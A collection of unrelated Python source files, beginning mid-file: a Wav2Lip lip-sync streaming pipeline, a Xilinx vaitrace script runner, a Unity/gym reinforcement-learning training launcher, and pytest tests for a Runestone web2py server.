                frame = cv2.rotate(frame, cv2.cv2.ROTATE_90_CLOCKWISE)
            # Crop with -1 meaning "up to the image border" for x2/y2.
            y1, y2, x1, x2 = args.crop
            if x2 == -1: x2 = frame.shape[1]
            if y2 == -1: y2 = frame.shape[0]
            frame = frame[y1:y2, x1:x2]
            full_frames.append(frame)
    print("Number of frames available for inference: " + str(len(full_frames)))
    return full_frames
def preprocess_audio():
    """Ensure args.audio refers to a wav file, extracting one with ffmpeg
    when it does not.

    Side effect: rewrites args.audio to 'temp/temp.wav' after extraction.
    """
    # Extract wav file
    if not args.audio.endswith('.wav'):
        print('Extracting raw audio...')
        # Security/robustness fix: pass the argument vector directly instead of
        # formatting a shell string, so audio paths containing spaces or shell
        # metacharacters can neither break the command nor inject into it.
        command = ['ffmpeg', '-y', '-i', args.audio, '-strict', '-2',
                   '-ar', str(args.audio_sr), 'temp/temp.wav']
        subprocess.call(command)
        args.audio = 'temp/temp.wav'
def txt2vid_inference(fifo_filename_video, process1, width, height):
    """Video-generation thread: lip-sync the input face video to args.audio.

    Audio is processed in 200 ms steps; for each step the Wav2Lip model
    predicts the mouth region of the corresponding frames, which are written
    as raw RGB to the named pipe `fifo_filename_video` (consumed by the
    output ffmpeg process set up in stream()).

    Args:
        fifo_filename_video: path of the FIFO to write raw frames to.
        process1, width, height: NOTE(review): accepted for thread-signature
            symmetry but apparently unused in this body -- confirm.
    """
    # Get frames from input video
    full_frames = preprocess_video()
    # run face detection (precompute)
    face_det_results = face_detect_wrapper(full_frames)
    # Load audio again for generating video face
    # ideally should be avoided(!!!!!!!!)
    wav = audio.load_wav(args.audio, args.audio_sr)
    print('Len of input wav file:', len(wav))
    # Overall process works like this:
    # - split wav file into small chunks
    # - Initiate output stream for writing frames to intermediate video file
    # - Go through the audio chunks one by one. For each chunk:
    #     - compute melspectrrogram: mels
    #     - convert mel into overlapping chunks (#chunks = #frames correspoonding to audio chunk, e.g., for 200 ms audio and fps 25, we get 5 frames)
    # - Now go through the mel_chunks and the input video frames, and run NN to compute the output frame one by one, which are written to the output stream
    # - Combine the output file with video with the original audio file to get final output
    # mel_idx_multiplier: this is supposed to align the audio melspec to the video fps,
    # by default set to 80.0/fps. This determines the mel chunking process, defining the
    # by which we move a window of size mel_step_size (16). For very short audio chunks, the
    # default vale doesn't work well due to rounding effects and edge effects leading to very
    # short mel vector relative to audio length. We fix this by reducing the mel_idx_multiplier
    # which reduces the offsets of the consecutive mel chunks, and makes sure we get enough
    # frames for each audio chunk.
    # NOTE: The value has been chosen for fps=25, and NUM_AUDIO_SAMPLES_PER_STEP 3200. For other values, please recalculate
    mel_idx_multiplier = 15.0 / args.fps
    # NUM_AUDIO_SAMPLES_PER_STEP: defines the chunks in which audio is processed.
    # Should be such that number of video frames within step is an integer
    # NOTE: Current system assumes 3200 (i.e., 200ms chunks)
    # NOTE: Can't make this much smaller, since that reduces the mel size to so small
    # that the mel_chunk produced is smaller than allowed by neural network architecture.
    NUM_AUDIO_SAMPLES_PER_STEP = np.ceil(args.audio_sr * 0.2).astype('int')  # 200 ms for 16000 Hz
    num_audio_samples = len(wav)
    model = load_model(args.checkpoint_path)
    print("Model loaded")
    frame_h, frame_w = full_frames[0].shape[:-1]
    # # initiate video writer
    # out = cv2.VideoWriter('temp/result.avi',
    #                       cv2.VideoWriter_fourcc(*'DIVX'), fps, (frame_w, frame_h))
    # Setup video streaming pipe:
    # (opening the FIFO blocks until the reader side is opened by ffmpeg)
    fifo_video_out = open(fifo_filename_video, "wb")
    frames_done = 0
    for audio_step in tqdm(range(int(np.ceil(num_audio_samples // NUM_AUDIO_SAMPLES_PER_STEP)))):
        curr_wav = wav[audio_step * NUM_AUDIO_SAMPLES_PER_STEP:(audio_step + 1) * NUM_AUDIO_SAMPLES_PER_STEP]
        # print(curr_wav.shape)
        # print('start:',audio_step*NUM_AUDIO_SAMPLES_PER_STEP)
        # print('end:',(audio_step+1)*NUM_AUDIO_SAMPLES_PER_STEP)
        mel = audio.melspectrogram(curr_wav)
        # print(curr_wav)
        # print(mel.shape)
        if np.isnan(mel.reshape(-1)).sum() > 0:
            raise ValueError(
                'Mel contains nan! Using a TTS voice? Add a small epsilon noise to the wav file and try again')
        # mel_chunk generation process. Generate overlapping chunks, with the shift in
        # chunks determined by int(i * mel_idx_multiplier), and the chunk length is
        # mel_step_size = 16 (except for last chunk). Two important constraints to satisfy:
        # 1. len(mel_chunks) should be equal to number of frames to be generated according to
        #    fps and NUM_AUDIO_SAMPLES_PER_STEP
        # 2. Each mel_chunk must be sufficiently long otherwise NN gives error.
        mel_chunks = []
        i = 0
        while 1:
            start_idx = int(i * mel_idx_multiplier)
            if start_idx + mel_step_size > len(mel[0]):
                mel_chunks.append(mel[:, len(mel[0]) - mel_step_size:])
                break
            mel_chunks.append(mel[:, start_idx: start_idx + mel_step_size])
            i += 1
        # print("Length of mel chunks: {}".format(len(mel_chunks)))
        # NOTE(review): batch_size is assigned but datagen batches by
        # args.wav2lip_batch_size internally -- this local looks unused.
        batch_size = args.wav2lip_batch_size
        gen = datagen(full_frames, face_det_results, mel_chunks, frames_done)
        for i, (img_batch, mel_batch, frames, coords) in enumerate(gen):
            img_batch = torch.FloatTensor(np.transpose(img_batch, (0, 3, 1, 2))).to(device)
            mel_batch = torch.FloatTensor(np.transpose(mel_batch, (0, 3, 1, 2))).to(device)
            with torch.no_grad():
                pred = model(mel_batch, img_batch)
            pred = pred.cpu().numpy().transpose(0, 2, 3, 1) * 255.
            # Paste each predicted face patch back into its source frame.
            for p, f, c in zip(pred, frames, coords):
                y1, y2, x1, x2 = c
                p = cv2.resize(p.astype(np.uint8), (x2 - x1, y2 - y1))
                f[y1:y2, x1:x2] = p
                # print(f.dtype)
                # cv2.imshow("mywindow",f)
                # cv2.waitKey(1)
                # write generated frame to video writer (note: no audio right now)
                # out.write(f)
                # Convert BGR (OpenCV) to RGB before writing to the pipe.
                out_frame_BGR = f.copy()
                out_frame_RGB = out_frame_BGR[:, :, [2, 1, 0]]
                frames_done += 1
                # write to pipe
                write_video_frame(fifo_video_out, out_frame_RGB)
    fifo_video_out.close()
    # out.release()
    # # combine original audio and generated video
    # command = 'ffmpeg -y -i {} -i {} -strict -2 -q:v 1 {}'.format(args.audio, 'temp/result.avi', args.outfile)
    # subprocess.call(command, shell=platform.system() != 'Windows')
def stream():
    """Top-level streaming pipeline.

    Sets up the ffmpeg input processes and the named pipes, starts the output
    ffmpeg process, then runs the video-generation and audio-relay threads to
    completion before waiting on ffmpeg and cleaning up the FIFOs. Relies on
    helpers defined elsewhere in this file (get_video_info,
    start_ffmpeg_process1*, start_ffmpeg_process2, audio_thread_handler).
    """
    # get audio in right formats
    preprocess_audio()
    logger.info('Preprocessed Audio')
    width, height = get_video_info(args.face)
    process1_video = start_ffmpeg_process1(args.face, args.fps)
    logger.info('Video input pipe set')
    process1_audio = start_ffmpeg_process1_audio(args.audio)
    logger.info('Audio input pipe set')
    # fifo pipes (remove file name if already exists)
    fifo_filename_video = '/tmp/fifovideo'
    fifo_filename_audio = '/tmp/fifoaudio'
    if os.path.exists(fifo_filename_video):
        os.remove(fifo_filename_video)
    if os.path.exists(fifo_filename_audio):
        os.remove(fifo_filename_audio)
    os.mkfifo(fifo_filename_video)
    os.mkfifo(fifo_filename_audio)
    logger.info('fifo exists now')
    process2 = start_ffmpeg_process2(fifo_filename_video, fifo_filename_audio, width, height, args.fps, args.port)
    logger.info('Output pipe set')
    audio_bytes_per_video_frame = np.ceil((args.audio_sr / args.fps) * 2).astype('int')  # 2 bytes, 640 audio frames (16000/25)
    # we run audio and video in separate threads otherwise the fifo opening blocks
    # create threads
    video_thread = threading.Thread(target=txt2vid_inference, args=(fifo_filename_video, process1_video, width, height))
    logger.info('Video thread launched')
    audio_thread = threading.Thread(target=audio_thread_handler, args=(fifo_filename_audio, process1_audio, audio_bytes_per_video_frame))
    logger.info('Audio thread launched')
    # start threads
    video_thread.start()
    audio_thread.start()
    # wait for threads to finish executing
    video_thread.join()
    audio_thread.join()
    logger.info('Waiting for ffmpeg process1')
    process1_video.wait()
    logger.info('Waiting for ffmpeg process2')
    process2.wait()
    os.remove(fifo_filename_video)
    os.remove(fifo_filename_audio)
    logger.info('Done')
def main():
    """Entry point: run the full streaming lip-sync pipeline."""
    stream()


if __name__ == '__main__':
    main()
|
vaitracePyRunner.py
|
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# Copyright 2019 Xilinx Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import time
import signal
from multiprocessing import Process
from threading import Thread
import collector
import tracer
import logging
pyProc = None
def pyRunCtx(pyCmd):
    """Compile and execute a Python program in-process, as if launched from
    the command line.

    Args:
        pyCmd: argv-style list; pyCmd[0] is the script path, the remaining
            entries are its arguments.

    Side effects: replaces sys.argv and prepends the script's directory to
    sys.path, mirroring what the interpreter does for a normal `python prog`
    invocation.
    """
    sys.argv[:] = pyCmd
    progname = pyCmd[0]
    sys.path.insert(0, os.path.dirname(progname))
    logging.info("vaitrace compile python code: %s" % progname)
    with open(progname, 'rb') as fp:
        code = compile(fp.read(), progname, 'exec')
    # Run with __name__ == '__main__' so `if __name__ == "__main__":` guards
    # inside the traced program fire exactly as under a direct run.
    globs = {
        '__file__': progname,
        '__name__': '__main__',
        '__package__': None,
        '__cached__': None,
    }
    # Typo fix in the log message: "exec poython code" -> "exec python code".
    logging.info("vaitrace exec python code: %s" % progname)
    exec(code, globs, None)
def handler(signum, frame):
    """SIGINT/SIGTERM handler: stop the traced workload if possible, then let
    run() finish processing the collected trace data.

    Args:
        signum: delivered signal number (unused).
        frame: interrupted stack frame (unused).
    """
    global pyProc
    # Guard against a signal arriving before run() has created the worker.
    if pyProc is not None and pyProc.is_alive():
        # Bug fix: run() creates pyProc as a threading.Thread, and Thread has
        # no kill() method -- the original pyProc.kill() raised AttributeError
        # on Ctrl-C. Only multiprocessing.Process can be killed; for a thread
        # we can merely log and let it run to completion.
        if hasattr(pyProc, "kill"):
            pyProc.kill()
            logging.info("Killing process...")
        logging.info("Processing trace data, please wait...")
    else:
        logging.info("Processing trace data, please wait...")
def run(globalOptions: dict):
    """Drive a traced run of a Python workload.

    Starts the tracers and collectors, executes the target script in a worker
    thread, enforces the optional timeout, then stops collection and
    post-processes the trace data.

    Args:
        globalOptions: parsed vaitrace configuration; the 'control' section
            carries the command line, timeout, and bookkeeping fields that are
            filled in here (launcher, pid, start time).
    """
    global pyProc
    signal.signal(signal.SIGINT, handler)
    signal.signal(signal.SIGTERM, handler)
    options = globalOptions
    # Bypass mode: run the target without any tracing and exit immediately.
    if options.get('cmdline_args').get('bypass', False):
        cmd = options.get('control').get('cmd')
        logging.info("Bypass vaitrace, just run cmd")
        pyCmd = options.get('control').get('cmd')
        pyRunCtx(pyCmd)
        exit(0)
    """Preparing"""
    tracer.prepare(options)
    tracer.start()
    """requirememt format: ["tracerName", "tracerName1", "hwInfo", ...]"""
    collector.prepare(options, tracer.getSourceRequirement())
    collector.start()
    """Start Running"""
    pyCmd = options.get('control').get('cmd')
    timeout = options.get('control').get('timeout')
    # pyRunCtx(pyCmd)
    pyProc = Thread(target=pyRunCtx, args=(pyCmd,))
    pyProc.start()
    options['control']['launcher'] = "python"
    options['control']['pid'] = os.getpid()
    options['control']['time'] = time.strftime(
        "%Y-%m-%d %H:%M:%S", time.localtime())
    if timeout <= 0:
        # No timeout configured: wait indefinitely for the workload.
        pyProc.join()
    else:
        # Poll once per second until the workload ends or the timeout elapses.
        while timeout > 0:
            time.sleep(1)
            timeout -= 1
            p = pyProc.is_alive()
            if p == False:
                break
        # NOTE(review): this logs "timeout" even when the loop exited because
        # the workload finished early -- confirm whether that is intended.
        logging.info("vaitrace timeout, waiting for Python thread terminated")
        pyProc.join()
    collector.stop()
    tracer.stop()
    tracer.process(collector.getData())
|
run.py
|
# coding: utf-8
"""
Usage:
python [options]
Options:
-h,--help 显示帮助
-i,--inference 推断 [default: False]
-a,--algorithm=<name> 算法 [default: ppo]
-c,--config-file=<file> 指定模型的超参数config文件 [default: None]
-e,--env=<file> 指定环境名称 [default: None]
-p,--port=<n> 端口 [default: 5005]
-u,--unity 是否使用unity客户端 [default: False]
-g,--graphic 是否显示图形界面 [default: False]
-n,--name=<name> 训练的名字 [default: None]
-s,--save-frequency=<n> 保存频率 [default: None]
-m,--models=<n> 同时训练多少个模型 [default: 1]
--store-dir=<file> 指定要保存模型、日志、数据的文件夹路径 [default: None]
--seed=<n> 指定模型的随机种子 [default: 0]
--max-step=<n> 每回合最大步长 [default: None]
--max-episode=<n> 总的训练回合数 [default: None]
--sampler=<file> 指定随机采样器的文件路径 [default: None]
--load=<name> 指定载入model的训练名称 [default: None]
--fill-in 指定是否预填充经验池至batch_size [default: False]
--prefill-choose 指定no_op操作时随机选择动作,或者置0 [default: False]
--gym 是否使用gym训练环境 [default: False]
--gym-agents=<n> 指定并行训练的数量 [default: 1]
--gym-env=<name> 指定gym环境的名字 [default: CartPole-v0]
--gym-env-seed=<n> 指定gym环境的随机种子 [default: 0]
--render-episode=<n> 指定gym环境从何时开始渲染 [default: None]
--info=<str> 抒写该训练的描述,用双引号包裹 [default: None]
Example:
python run.py -a sac -g -e C:/test.exe -p 6666 -s 10 -n test -c config.yaml --max-step 1000 --max-episode 1000 --sampler C:/test_sampler.yaml
python run.py -a ppo -u -n train_in_unity --load last_train_name
python run.py -ui -a td3 -n inference_in_unity
python run.py -gi -a dddqn -n inference_with_build -e my_executable_file.exe
python run.py --gym -a ppo -n train_using_gym --gym-env MountainCar-v0 --render-episode 1000 --gym-agents 4
python run.py -u -a ddpg -n pre_fill --fill-in --prefill-choose
"""
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
import sys
import time
NAME = time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime(time.time()))
import platform
BASE_DIR = f'C:/RLData' if platform.system() == "Windows" else os.environ['HOME'] + f'/RLData'
from typing import Dict
from copy import deepcopy
from docopt import docopt
from multiprocessing import Process
from common.agent import Agent
from common.yaml_ops import load_yaml
from common.config import Config
def get_options(options: Dict):
    """Convert the raw docopt option dict into a typed Config object.

    docopt renders an unset ``[default: None]`` as the literal string 'None';
    such values are mapped to a real None, everything else is cast to the
    field's target type.
    """
    def parse(key, cast):
        raw = options[key]
        return None if raw == 'None' else cast(raw)

    op = Config()
    op.add_dict({
        'inference': bool(options['--inference']),
        'algo': str(options['--algorithm']),
        'algo_config': parse('--config-file', str),
        'env': parse('--env', str),
        'port': int(options['--port']),
        'unity': bool(options['--unity']),
        'graphic': bool(options['--graphic']),
        'name': parse('--name', str),
        'save_frequency': parse('--save-frequency', int),
        'models': int(options['--models']),
        'store_dir': parse('--store-dir', str),
        'seed': int(options['--seed']),
        'max_step': parse('--max-step', int),
        'max_episode': parse('--max-episode', int),
        'sampler': parse('--sampler', str),
        'load': parse('--load', str),
        'fill_in': bool(options['--fill-in']),
        'prefill_choose': bool(options['--prefill-choose']),
        'gym': bool(options['--gym']),
        'gym_agents': int(options['--gym-agents']),
        'gym_env': str(options['--gym-env']),
        'gym_env_seed': int(options['--gym-env-seed']),
        'render_episode': parse('--render-episode', int),
        'info': parse('--info', str)
    })
    return op
def agent_run(*args):
    """Process entry point: build an Agent from (env_args, model_args,
    buffer_args, train_args) and immediately call it to start training."""
    Agent(*args)()
def run():
    """Parse CLI options, assemble env/model/buffer/train configs from
    config.yaml, and launch one or more training (or inference) runs."""
    if sys.platform.startswith('win'):
        import win32api
        import win32con
        import _thread

        def _win_handler(event, hook_sigint=_thread.interrupt_main):
            # Translate a Windows console Ctrl-C event (code 0) into the
            # regular Python KeyboardInterrupt via _thread.interrupt_main.
            if event == 0:
                hook_sigint()
                return 1
            return 0
        # Add the _win_handler function to the windows console's handler function list
        win32api.SetConsoleCtrlHandler(_win_handler, 1)

    options = docopt(__doc__)
    options = get_options(dict(options))
    print(options)
    default_config = load_yaml(f'config.yaml')
    # gym > unity > unity_env
    model_args = Config(**default_config['model'])
    train_args = Config(**default_config['train'])
    env_args = Config()
    buffer_args = Config(**default_config['buffer'])

    model_args.algo = options.algo
    model_args.algo_config = options.algo_config
    model_args.seed = options.seed
    model_args.load = options.load

    if options.gym:
        train_args.add_dict(default_config['gym']['train'])
        train_args.update({'render_episode': options.render_episode})
        env_args.add_dict(default_config['gym']['env'])
        env_args.type = 'gym'
        env_args.env_name = options.gym_env
        env_args.env_num = options.gym_agents
        env_args.env_seed = options.gym_env_seed
    else:
        train_args.add_dict(default_config['unity']['train'])
        env_args.add_dict(default_config['unity']['env'])
        env_args.type = 'unity'
        env_args.port = options.port
        env_args.sampler_path = options.sampler
        if options.unity:
            # Connect to a running Unity editor instead of an executable.
            env_args.file_path = None
            env_args.env_name = 'unity'
        else:
            env_args.update({'file_path': options.env})
            # NOTE(review): if --env was left unset, file_path is None and
            # os.path.exists(None) raises TypeError -- confirm upstream checks.
            if os.path.exists(env_args.file_path):
                # Derive a readable env name from the last two path components.
                env_args.env_name = os.path.join(
                    *os.path.split(env_args.file_path)[0].replace('\\', '/').replace(r'//', r'/').split('/')[-2:]
                )
            else:
                raise Exception('can not find this file.')

    if options.inference:
        env_args.train_mode = False
        env_args.render = True
    else:
        env_args.train_mode = True
        env_args.render = options.graphic

    train_args.index = 0
    train_args.name = NAME
    train_args.inference = options.inference
    train_args.fill_in = options.fill_in
    train_args.prefill_choose = options.prefill_choose
    train_args.base_dir = os.path.join(options.store_dir or BASE_DIR, env_args.env_name, model_args.algo)
    train_args.update(
        dict([
            ['name', options.name],
            ['max_step', options.max_step],
            ['max_episode', options.max_episode],
            ['save_frequency', options.save_frequency],
            ['info', options.info]
        ])
    )

    if options.inference:
        # NOTE(review): evaluate() is invoked but execution falls through to
        # the training launch below (no return) -- confirm this is intended.
        Agent(env_args, model_args, buffer_args, train_args).evaluate()

    trails = options.models
    if trails == 1:
        agent_run(env_args, model_args, buffer_args, train_args)
    elif trails > 1:
        # Launch `trails` independent runs, one process each, with staggered
        # starts, distinct seeds/indices, and (for unity) distinct ports.
        processes = []
        for i in range(trails):
            _env_args = deepcopy(env_args)
            _model_args = deepcopy(model_args)
            _model_args.seed += i * 10
            _buffer_args = deepcopy(buffer_args)
            _train_args = deepcopy(train_args)
            _train_args.index = i
            if _env_args.type == 'unity':
                _env_args.port = env_args.port + i
            p = Process(target=agent_run, args=(_env_args, _model_args, _buffer_args, _train_args))
            p.start()
            time.sleep(10)
            processes.append(p)
        [p.join() for p in processes]
    else:
        raise Exception('trials must be greater than 0.')
if __name__ == "__main__":
    try:
        run()
    except Exception as e:
        # Bug fix: `print(e)` discarded the traceback, making any failure in
        # run() nearly impossible to debug. Print the full stack trace before
        # exiting.
        import traceback
        traceback.print_exc()
        sys.exit()
|
test_server.py
|
# *****************************************
# |docname| - Tests using the web2py server
# *****************************************
# These tests start the web2py server then submit requests to it. All the fixtures are auto-imported by pytest from ``conftest.py``.
#
# .. contents::
#
# Imports
# =======
# These are listed in the order prescribed by `PEP 8
# <http://www.python.org/dev/peps/pep-0008/#imports>`_.
#
# Standard library
# ----------------
from textwrap import dedent
import json
from threading import Thread
import datetime
import re
import sys
import time
# Third-party imports
# -------------------
import pytest
import six
# Local imports
# -------------
from .utils import web2py_controller_import
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
# Debugging notes
# ===============
# Invoke the debugger.
##import pdb; pdb.set_trace()
# Put this in web2py code, then use the web-based debugger.
##from gluon.debug import dbg; dbg.set_trace()
# Tests
# =====
# Use for easy manual testing of the server, by setting up a user and class automatically. Comment out the line below to enable it.
@pytest.mark.skip(reason="Only needed for manual testing.")
def test_manual(runestone_db_tools, test_user):
    """Scaffold a course and a user, then drop into pdb so a developer can
    poke at the running server interactively. Skipped in normal runs."""
    # Modify this as desired to create courses, users, etc. for manual testing.
    course_1 = runestone_db_tools.create_course()
    test_user("bob", "bob", course_1)
    # Pause in the debugger until manual testing is done.
    import pdb

    pdb.set_trace()
def test_killer(test_assignment, test_client, test_user_1, runestone_db_tools):
    """
    This test ensures that we have the routing set up for testing properly.
    This test will fail if routes.py is set up as follows.

    routes_onerror = [
        ('runestone/static/404', '/runestone/static/fail.html'),
        ('runestone/500', '/runestone/default/reportabug.html'),
    ]

    for testing purposes we don't want web2py to capture 500 errors.
    """
    # The endpoint deliberately raises; the post must propagate the exception
    # rather than being swallowed by a web2py error route.
    with pytest.raises(Exception) as excinfo:
        test_client.post("admin/killer")
        assert test_client.text == ""
    print(excinfo.value)
    assert "ticket" in str(excinfo.value) or "INTERNAL" in str(excinfo.value)
# Validate the HTML produced by various web2py pages.
# NOTE -- this is the start of a really really long decorator for test_1
# Each parametrize entry: (url, requires_login, expected_string, expected_errors).
@pytest.mark.parametrize(
    "url, requires_login, expected_string, expected_errors",
    [
        # **Admin**
        # ----------
        # FIXME: Flashed messages don't seem to work.
        # ('admin/index', False, 'You must be registered for a course to access this page', 1),
        # ('admin/index', True, 'You must be an instructor to access this page', 1),
        ("admin/doc", True, "Runestone Help and Documentation", 1),
        # **Assignments**
        # ----------------
        ("assignments/chooseAssignment", True, "Assignments", 1),
        ("assignments/doAssignment", True, "Bad Assignment ID", 1),
        # TODO: Why 2 errors here? Was just 1.
        (
            "assignments/practice",
            True,
            "Practice tool is not set up for this course yet.",
            2,
        ),
        ("assignments/practiceNotStartedYet", True, "test_course_1", 2),
        # **Default**
        # ------------
        # *User*
        #
        # The `authentication <http://web2py.com/books/default/chapter/29/09/access-control#Authentication>`_ section gives the URLs exposed by web2py. Check these.
        ("default/user/login", False, "Login", 1),
        ("default/user/register", False, "Registration", 1),
        ("default/user/logout", True, "Logged out", 1),
        # One validation error is a result of removing the input field for the e-mail, but web2py still tries to label it, which is an error.
        ("default/user/profile", True, "Profile", 2),
        ("default/user/change_password", True, "Change password", 1),
        # Runestone doesn't support this.
        #'default/user/verify_email', False, 'Verify email', 1),
        ("default/user/retrieve_username", False, "Retrieve username", 1),
        ("default/user/request_reset_password", False, "Request reset password", 1),
        # This doesn't display a webpage, but instead redirects to courses.
        # ('default/user/reset_password, False, 'Reset password', 1),
        ("default/user/impersonate", True, "Impersonate", 1),
        # FIXME: This produces an exception.
        #'default/user/groups', True, 'Groups', 1),
        ("default/user/not_authorized", False, "Not authorized", 1),
        # *Other pages*
        #
        # TODO: What is this for?
        # ('default/call', False, 'Not found', 0),
        ("default/index", True, "Course Selection", 1),
        ("default/about", False, "About Us", 1),
        ("default/error", False, "Error: the document does not exist", 1),
        ("default/ack", False, "Acknowledgements", 1),
        # web2py generates invalid labels for the radio buttons in this form.
        ("default/bio", True, "Tell Us About Yourself", 3),
        ("default/courses", True, "Course Selection", 1),
        ("default/remove", True, "Remove a Course", 1),
        # Should work in both cases.
        ("default/reportabug", False, "Report a Bug", 1),
        ("default/reportabug", True, "Report a Bug", 1),
        # ('default/sendreport', True, 'Could not create issue', 1),
        ("default/terms", False, "Terms and Conditions", 1),
        ("default/privacy", False, "Runestone Academy Privacy Policy", 1),
        ("default/donate", False, "Support Runestone Interactive", 1),
        # TODO: This doesn't really test much of the body of either of these.
        ("default/coursechooser", True, "Course Selection", 1),
        # If we choose an invalid course, then we go to the profile to allow the user to add that course. The second validation failure seems to be about the ``for`` attribute of the ```<label class="readonly" for="auth_user_email" id="auth_user_email__label">`` tag, since the id ``auth_user_email`` isn't defined elsewhere.
        ("default/coursechooser/xxx", True, "Course IDs for open courses", 2),
        ("default/removecourse", True, "Course Selection", 1),
        ("default/removecourse/xxx", True, "Course Selection", 1),
        (
            "dashboard/studentreport",
            True,
            "Recent Activity",
            1,
        ),
        # **Designer**
        # -------------
        (
            "designer/index",
            True,
            "This page allows you to select a book for your own class.",
            1,
        ),
        ("designer/build", True, "Build a Custom", 1),
        # **OAuth**
        # ----------
        (
            "oauth/index",
            False,
            "This page is a utility for accepting redirects from external services like Spotify or LinkedIn that use oauth.",
            1,
        ),
        ("books/index", False, "Runestone Test Book", 1),
        ("books/published", False, "Runestone Test Book", 1),
        # TODO: Many other views!
    ],
)
def test_validate_user_pages(
    url, requires_login, expected_string, expected_errors, test_client, test_user_1
):
    """Smoke-test a battery of user-facing pages: fetch each URL (logged in or
    out as required) and validate both the expected page content and the
    HTML-validator error count."""
    if requires_login:
        test_user_1.login()
    else:
        test_client.logout()
    test_client.validate(url, expected_string, expected_errors)
# Validate the HTML in instructor-only pages.
# NOTE -- this is the start of a really really long decorator for test_2
# Each parametrize entry: (url, expected_string, expected_errors).
@pytest.mark.parametrize(
    "url, expected_string, expected_errors",
    [
        # **Default**
        # ------------
        # web2py-generated stuff produces two extra errors.
        ("default/bios", "Bios", 3),
        # FIXME: The element ``<form id="editIndexRST" action="">`` in ``views/admin/admin.html`` produces the error ``Bad value \u201c\u201d for attribute \u201caction\u201d on element \u201cform\u201d: Must be non-empty.``.
        #
        # **Admin**
        # ----------
        ("admin/admin", "Course Settings", 1),
        ("admin/course_students", '"test_user_1"', 2),
        ("admin/createAssignment", "ERROR", None),
        ("admin/grading", "assignment", 1),
        # TODO: This produces an exception.
        # ('admin/practice', 'Choose when students should start their practice.', 1),
        # TODO: This deletes the course, making the test framework raise an exception. Need a separate case to catch this.
        # ('admin/deletecourse', 'Manage Section', 2),
        # FIXME: these raise an exception.
        # ('admin/addinstructor', 'Trying to add non-user', 1), -- this is an api call
        # ('admin/add_practice_items', 'xxx', 1), -- this is an api call
        ("admin/assignments", "Assignment", 6),  # labels for hidden elements
        # ('admin/backup', 'xxx', 1),
        ("admin/practice", "Choose when students should start", 1),
        # ('admin/removeassign', 'Cannot remove assignment with id of', 1),
        # ('admin/removeinstructor', 'xxx', 1),
        # ('admin/removeStudents', 'xxx', 1),
        ("admin/get_assignment", "Error: assignment ID", 1),
        ("admin/get_assignment?assignmentid=junk", "Error: assignment ID", 1),
        ("admin/get_assignment?assignmentid=100", "Error: assignment ID", 1),
        # TODO: added to the ``createAssignment`` endpoint so far.
        # **Dashboard**
        # --------------
        ("dashboard/index", "Instructor Dashboard", 1),
        ("dashboard/grades", "Gradebook", 1),
        # TODO: This doesn't really test anything about either
        # exercisemetrics or questiongrades other than properly handling a call with no information
        ("dashboard/exercisemetrics", "Instructor Dashboard", 1),
        ("dashboard/questiongrades", "Instructor Dashboard", 1),
    ],
)
def test_validate_instructor_pages(
    url, expected_string, expected_errors, test_client, test_user, test_user_1
):
    """Instructor-only pages: logged-out users are bounced to Login, plain
    students get 'Insufficient privileges', and instructors see the page."""
    test_instructor_1 = test_user("test_instructor_1", "password_1", test_user_1.course)
    test_instructor_1.make_instructor()
    # Make sure that non-instructors are redirected.
    test_client.logout()
    test_client.validate(url, "Login")

    test_user_1.login()
    test_client.validate(url, "Insufficient privileges")
    test_client.logout()

    # Test the instructor results.
    test_instructor_1.login()
    test_client.validate(url, expected_string, expected_errors)
# Test the ``ajax/preview_question`` endpoint.
def test_preview_question(test_client, test_user_1):
    """Exercise the ``ajax/preview_question`` endpoint with missing, invalid,
    and valid (Unicode-bearing) RST payloads."""
    preview_question = "ajax/preview_question"
    # Passing no parameters should raise an error.
    test_client.validate(preview_question, "Error: ")
    # Passing something not JSON-encoded should raise an error.
    test_client.validate(preview_question, "Error: ", data={"code": "xxx"})
    # Passing invalid RST should produce a Sphinx warning.
    test_client.validate(preview_question, "WARNING", data={"code": '"*hi"'})
    # Passing valid RST with no Runestone component should produce an error.
    test_client.validate(preview_question, "Error: ", data={"code": '"*hi*"'})
    # Passing a string with Unicode should work. Note that 0x0263 == 611; the JSON-encoded result will use this.
    test_client.validate(
        preview_question,
        r"\u03c0",
        data={
            "code": json.dumps(
                dedent(
                    """\
                    .. fillintheblank:: question_1

                        Mary had a π.

                        - :x: Whatever.
                    """
                )
            )
        },
    )

    # Verify that ``question_1`` is not in the database. TODO: This passes even if the ``DBURL`` env variable in ``ajax.py`` fucntion ``preview_question`` isn't deleted. So, this test doesn't work.
    db = test_user_1.runestone_db_tools.db
    assert len(db(db.fitb_answers.div_id == "question_1").select()) == 0
    # TODO: Add a test case for when the runestone build produces a non-zero return code.
# Test the ``default/user/profile`` endpoint.
def test_user_profile(test_client, test_user_1):
    """Update a user's profile (new names, e-mail, course) and verify which
    fields actually change in the database -- the username must not."""
    test_user_1.login()
    runestone_db_tools = test_user_1.runestone_db_tools
    course_name = "test_course_2"
    test_course_2 = runestone_db_tools.create_course(course_name)
    # Test a non-existant course.
    test_user_1.update_profile(
        expected_string="Errors in form", course_name="does_not_exist"
    )
    # Test an invalid e-mail address. TODO: This doesn't produce an error message.
    ##test_user_1.update_profile(expected_string='Errors in form',
    ##    email='not a valid e-mail address')

    # Change the user's profile data; add a new course.
    username = "a_different_username"
    first_name = "a different first"
    last_name = "a different last"
    email = "a_different_email@foo.com"
    test_user_1.update_profile(
        username=username,
        first_name=first_name,
        last_name=last_name,
        email=email,
        course_name=course_name,
        accept_tcp="",
        is_free=True,
    )

    # Check the values.
    db = runestone_db_tools.db
    user = db(db.auth_user.id == test_user_1.user_id).select().first()
    # The username shouldn't be changable.
    assert user.username == test_user_1.username
    assert user.first_name == first_name
    assert user.last_name == last_name
    # TODO: The e-mail address isn't updated.
    # assert user.email == email
    assert user.course_id == test_course_2.course_id
    assert user.accept_tcp == False  # noqa: E712
    # TODO: I'm not sure where the section is stored.
    # assert user.section == section
